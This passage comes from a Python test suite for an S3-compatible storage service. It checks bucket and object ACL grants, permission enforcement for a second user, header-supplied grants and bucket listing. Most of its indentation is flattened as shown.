@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_writeacp():
_check_object_acl('WRITE_ACP')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl READ')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_read():
_check_object_acl('READ')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl READ_ACP')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_readacp():
_check_object_acl('READ_ACP')
def _bucket_acl_grant_userid(permission):
"""
create a new bucket, grant a specific user the specified
permission, read back the acl and verify correct setting
"""
bucket_name = get_new_bucket()
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': permission}
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=grant)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission=permission,
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
return bucket_name
def _check_bucket_acl_grant_can_read(bucket_name):
"""
verify ability to read the specified bucket
"""
alt_client = get_alt_client()
response = alt_client.head_bucket(Bucket=bucket_name)
def _check_bucket_acl_grant_cant_read(bucket_name):
"""
verify inability to read the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.head_bucket, Bucket=bucket_name)
def _check_bucket_acl_grant_can_readacp(bucket_name):
"""
verify ability to read acls on specified bucket
"""
alt_client = get_alt_client()
alt_client.get_bucket_acl(Bucket=bucket_name)
def _check_bucket_acl_grant_cant_readacp(bucket_name):
"""
verify inability to read acls on specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.get_bucket_acl, Bucket=bucket_name)
def _check_bucket_acl_grant_can_write(bucket_name):
"""
verify ability to write the specified bucket
"""
alt_client = get_alt_client()
alt_client.put_object(Bucket=bucket_name, Key='foo-write', Body='bar')
def _check_bucket_acl_grant_cant_write(bucket_name):
"""
verify inability to write the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key='foo-write', Body='bar')
def _check_bucket_acl_grant_can_writeacp(bucket_name):
"""
verify ability to set acls on the specified bucket
"""
alt_client = get_alt_client()
alt_client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
def _check_bucket_acl_grant_cant_writeacp(bucket_name):
"""
verify inability to set acls on the specified bucket
"""
alt_client = get_alt_client()
check_access_denied(alt_client.put_bucket_acl,Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid FULL_CONTROL')
@attr(assertion='can read/write data/acls')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_bucket_acl_grant_userid_fullcontrol():
bucket_name = _bucket_acl_grant_userid('FULL_CONTROL')
# alt user can read
_check_bucket_acl_grant_can_read(bucket_name)
# can read acl
_check_bucket_acl_grant_can_readacp(bucket_name)
# can write
_check_bucket_acl_grant_can_write(bucket_name)
# can write acl
_check_bucket_acl_grant_can_writeacp(bucket_name)
client = get_client()
bucket_acl_response = client.get_bucket_acl(Bucket=bucket_name)
owner_id = bucket_acl_response['Owner']['ID']
owner_display_name = bucket_acl_response['Owner']['DisplayName']
main_display_name = get_main_display_name()
main_user_id = get_main_user_id()
eq(owner_id, main_user_id)
eq(owner_display_name, main_display_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid READ')
@attr(assertion='can read data, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_read():
bucket_name = _bucket_acl_grant_userid('READ')
# alt user can read
_check_bucket_acl_grant_can_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can't write acl
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid READ_ACP')
@attr(assertion='can read acl, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_readacp():
bucket_name = _bucket_acl_grant_userid('READ_ACP')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can read acl
_check_bucket_acl_grant_can_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can't write acp
#_check_bucket_acl_grant_cant_writeacp_can_readacp(bucket)
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid WRITE')
@attr(assertion='can write data, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_write():
bucket_name = _bucket_acl_grant_userid('WRITE')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can write
_check_bucket_acl_grant_can_write(bucket_name)
# can't write acl
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid WRITE_ACP')
@attr(assertion='can write acls, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_writeacp():
bucket_name = _bucket_acl_grant_userid('WRITE_ACP')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can write acl
_check_bucket_acl_grant_can_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/invalid userid')
@attr(assertion='fails 400')
def test_bucket_acl_grant_nonexist_user():
bucket_name = get_new_bucket()
client = get_client()
bad_user_id = '_foo'
#response = client.get_bucket_acl(Bucket=bucket_name)
grant = {'Grantee': {'ID': bad_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name, AccessControlPolicy=grant)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='revoke all ACLs')
@attr(assertion='can: read obj, get/set bucket acl, cannot write objs')
def test_bucket_acl_no_grants():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_bucket_acl(Bucket=bucket_name)
old_grants = response['Grants']
policy = {}
policy['Owner'] = response['Owner']
# clear grants
policy['Grants'] = []
# remove read/write permission
response = client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
# can read
client.get_object(Bucket=bucket_name, Key='foo')
# can't write
check_access_denied(client.put_object, Bucket=bucket_name, Key='baz', Body='a')
    # TODO: fix this test once a fix is in for the same issues as in
    # test_access_bucket_private_object_private
client2 = get_client()
# owner can read acl
client2.get_bucket_acl(Bucket=bucket_name)
# owner can write acl
client2.put_bucket_acl(Bucket=bucket_name, ACL='private')
# set policy back to original so that bucket can be cleaned up
policy['Grants'] = old_grants
client2.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
def _get_acl_header(user_id=None, perms=None):
    all_perms = ["read", "write", "read-acp", "write-acp", "full-control"]
    if user_id is None:
        user_id = get_alt_user_id()
    if perms is None:
        perms = all_perms
    headers = [("x-amz-grant-{perm}".format(perm=perm), "id={uid}".format(uid=user_id))
               for perm in perms]
    return headers
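# For reference (values illustrative), _get_acl_header(perms=['read', 'write-acp'])
# returns tuples of the form:
#   [('x-amz-grant-read', 'id=<alt user id>'),
#    ('x-amz-grant-write-acp', 'id=<alt user id>')]
# The tests below splice these into the raw request headers before signing.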
@attr(resource='object')
@attr(method='PUT')
@attr(operation='add all grants to user through headers')
@attr(assertion='adds all grants individually to second user')
@attr('fails_on_dho')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_object_header_acl_grants():
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
headers = _get_acl_header()
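    # Splice the x-amz-grant-* header tuples into the raw request just before
    # it is signed; the header list lives in request.headers._headers (an
    # implementation detail of botocore's HTTPHeaders).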
def add_headers_before_sign(**kwargs):
updated_headers = (kwargs['request'].__dict__['headers'].__dict__['_headers'] + headers)
kwargs['request'].__dict__['headers'].__dict__['_headers'] = updated_headers
client.meta.events.register('before-sign.s3.PutObject', add_headers_before_sign)
client.put_object(Bucket=bucket_name, Key='foo_key', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo_key')
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='PUT')
@attr(operation='add all grants to user through headers')
@attr(assertion='adds all grants individually to second user')
@attr('fails_on_dho')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_header_acl_grants():
    headers = _get_acl_header()
    bucket_name = get_new_bucket_name()
    client = get_client()
def add_headers_before_sign(**kwargs):
updated_headers = (kwargs['request'].__dict__['headers'].__dict__['_headers'] + headers)
kwargs['request'].__dict__['headers'].__dict__['_headers'] = updated_headers
client.meta.events.register('before-sign.s3.CreateBucket', add_headers_before_sign)
client.create_bucket(Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
check_grants(
grants,
[
dict(
Permission='READ',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
alt_client = get_alt_client()
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
# set bucket acl to public-read-write so that teardown can work
alt_client.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
# This test will fail on DH Objects. DHO allows multiple users with one account, which
# would violate the uniqueness requirement of a user's email. As such, DHO users are
# created without an email.
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='add second FULL_CONTROL user')
@attr(assertion='works for S3, fails for DHO')
@attr('fails_on_aws') # <Error><Code>AmbiguousGrantByEmailAddress</Code><Message>The e-mail address you provided is associated with more than one account. Please retry your request using a different identification method or after resolving the ambiguity.</Message>
def test_bucket_acl_grant_email():
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
alt_email_address = get_alt_email()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
grant = {'Grantee': {'EmailAddress': alt_email_address, 'Type': 'AmazonCustomerByEmail' }, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy = grant)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='add acl for nonexistent user')
@attr(assertion='fail 400')
def test_bucket_acl_grant_email_not_exist():
# behavior not documented by amazon
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
alt_email_address = get_alt_email()
NONEXISTENT_EMAIL = 'doesnotexist@dreamhost.com.invalid'
grant = {'Grantee': {'EmailAddress': NONEXISTENT_EMAIL, 'Type': 'AmazonCustomerByEmail'}, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name, AccessControlPolicy = grant)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'UnresolvableGrantByEmailAddress')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='revoke all ACLs')
@attr(assertion='acls read back as empty')
def test_bucket_acl_revoke_all():
# revoke all access, including the owner's access
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_bucket_acl(Bucket=bucket_name)
old_grants = response['Grants']
policy = {}
policy['Owner'] = response['Owner']
# clear grants
policy['Grants'] = []
# remove read/write permission for everyone
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
response = client.get_bucket_acl(Bucket=bucket_name)
eq(len(response['Grants']), 0)
# set policy back to original so that bucket can be cleaned up
policy['Grants'] = old_grants
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
# TODO rgw log_bucket.set_as_logging_target() gives 403 Forbidden
# http://tracker.newdream.net/issues/984
@attr(resource='bucket.log')
@attr(method='put')
@attr(operation='set/enable/disable logging target')
@attr(assertion='operations succeed')
@attr('fails_on_rgw')
def test_logging_toggle():
bucket_name = get_new_bucket()
client = get_client()
main_display_name = get_main_display_name()
main_user_id = get_main_user_id()
status = {'LoggingEnabled': {'TargetBucket': bucket_name, 'TargetGrants': [{'Grantee': {'DisplayName': main_display_name, 'ID': main_user_id,'Type': 'CanonicalUser'},'Permission': 'FULL_CONTROL'}], 'TargetPrefix': 'foologgingprefix'}}
client.put_bucket_logging(Bucket=bucket_name, BucketLoggingStatus=status)
client.get_bucket_logging(Bucket=bucket_name)
    # an empty BucketLoggingStatus disables logging
    status = {}
client.put_bucket_logging(Bucket=bucket_name, BucketLoggingStatus=status)
# NOTE: this does not actually test whether or not logging works
def _setup_access(bucket_acl, object_acl):
"""
Simple test fixture: create a bucket with given ACL, with objects:
- a: owning user, given ACL
- a2: same object accessed by some other user
- b: owning user, default ACL in bucket w/given ACL
    - b2: same object accessed by some other user
"""
bucket_name = get_new_bucket()
client = get_client()
key1 = 'foo'
key2 = 'bar'
newkey = 'new'
client.put_bucket_acl(Bucket=bucket_name, ACL=bucket_acl)
client.put_object(Bucket=bucket_name, Key=key1, Body='foocontent')
client.put_object_acl(Bucket=bucket_name, Key=key1, ACL=object_acl)
client.put_object(Bucket=bucket_name, Key=key2, Body='barcontent')
return bucket_name, key1, key2, newkey
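# Typical call pattern for the test_access_* tests below (sketch):
#   bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private',
#                                                   object_acl='public-read')
# key1 carries the explicit object ACL, key2 keeps the bucket's default ACL,
# and newkey names an object that does not exist yet (used for write checks).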
def get_bucket_key_names(bucket_name):
objs_list = get_objects_list(bucket_name)
    return frozenset(objs_list)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/private')
@attr(assertion='public has no access to bucket or objects')
def test_access_bucket_private_object_private():
# all the test_access_* tests follow this template
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='private')
alt_client = get_alt_client()
# acled object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
# default object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
# bucket read fail
check_access_denied(alt_client.list_objects, Bucket=bucket_name)
# acled object write fail
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
    # NOTE: the put_object call above causes the connection to go bad, so the
    # client can't be used anymore. This can be solved either by:
    # 1) putting an empty string ('') in the 'Body' field of those put_object calls
    # 2) getting a new client, hence the creation of alt_client{2,3} for the tests below
    # TODO: test this from another host and on AWS; report it to Amazon if the findings are identical
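    # Option (1) would look like, for example:
    #   check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key2, Body='')
    # The code below uses option (2) instead.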
alt_client2 = get_alt_client()
# default object write fail
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
# bucket write fail
alt_client3 = get_alt_client()
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/private with list-objects-v2')
@attr(assertion='public has no access to bucket or objects')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_private():
# all the test_access_* tests follow this template
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='private')
alt_client = get_alt_client()
# acled object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
# default object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
# bucket read fail
check_access_denied(alt_client.list_objects_v2, Bucket=bucket_name)
# acled object write fail
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
    # NOTE: the put_object call above causes the connection to go bad, so the
    # client can't be used anymore. This can be solved either by:
    # 1) putting an empty string ('') in the 'Body' field of those put_object calls
    # 2) getting a new client, hence the creation of alt_client{2,3} for the tests below
    # TODO: test this from another host and on AWS; report it to Amazon if the findings are identical
alt_client2 = get_alt_client()
# default object write fail
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
# bucket write fail
alt_client3 = get_alt_client()
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read')
@attr(assertion='public can only read readable object')
def test_access_bucket_private_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read, b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read with list-objects-v2')
@attr(assertion='public can only read readable object')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read, b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects_v2, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read/write')
@attr(assertion='public can only read the readable object')
def test_access_bucket_private_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a private bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read/write with list-objects-v2')
@attr(assertion='public can only read the readable object')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a private bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects_v2, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/private')
@attr(assertion='public can only list the bucket')
def test_access_bucket_publicread_object_private():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='private')
alt_client = get_alt_client()
# a should be private, b gets default (private)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/public-read')
@attr(assertion='public can read readable objects and list bucket')
def test_access_bucket_publicread_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
# a should be public-read, b gets default (private)
body = _get_body(response)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/public-read-write')
@attr(assertion='public can read readable objects and list bucket')
def test_access_bucket_publicread_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a r/o bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/private')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_private():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='private')
alt_client = get_alt_client()
# a should be private, b gets default (private)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='barcontent')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/public-read')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='public-read')
alt_client = get_alt_client()
# a should be public-read, b gets default (private)
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
eq(body, 'foocontent')
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='barcontent')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/public-read-write')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-write, b gets default (private)
eq(body, 'foocontent')
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='foooverwrite')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets')
@attr(assertion='returns all expected buckets')
def test_buckets_create_then_list():
client = get_client()
bucket_names = []
for i in range(5):
bucket_name = get_new_bucket_name()
bucket_names.append(bucket_name)
for name in bucket_names:
client.create_bucket(Bucket=name)
    buckets_list = get_buckets_list()
for name in bucket_names:
if name not in buckets_list:
            raise RuntimeError("S3 implementation's GET on Service did not return bucket we created: %r" % name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets')
@attr(assertion='all buckets have a sane creation time')
def test_buckets_list_ctime():
# check that creation times are within a day
before = datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
client = get_client()
for i in range(5):
client.create_bucket(Bucket=get_new_bucket_name())
response = client.list_buckets()
for bucket in response['Buckets']:
ctime = bucket['CreationDate']
assert before <= ctime, '%r > %r' % (before, ctime)
@attr(resource='bucket')
@attr(method='get')
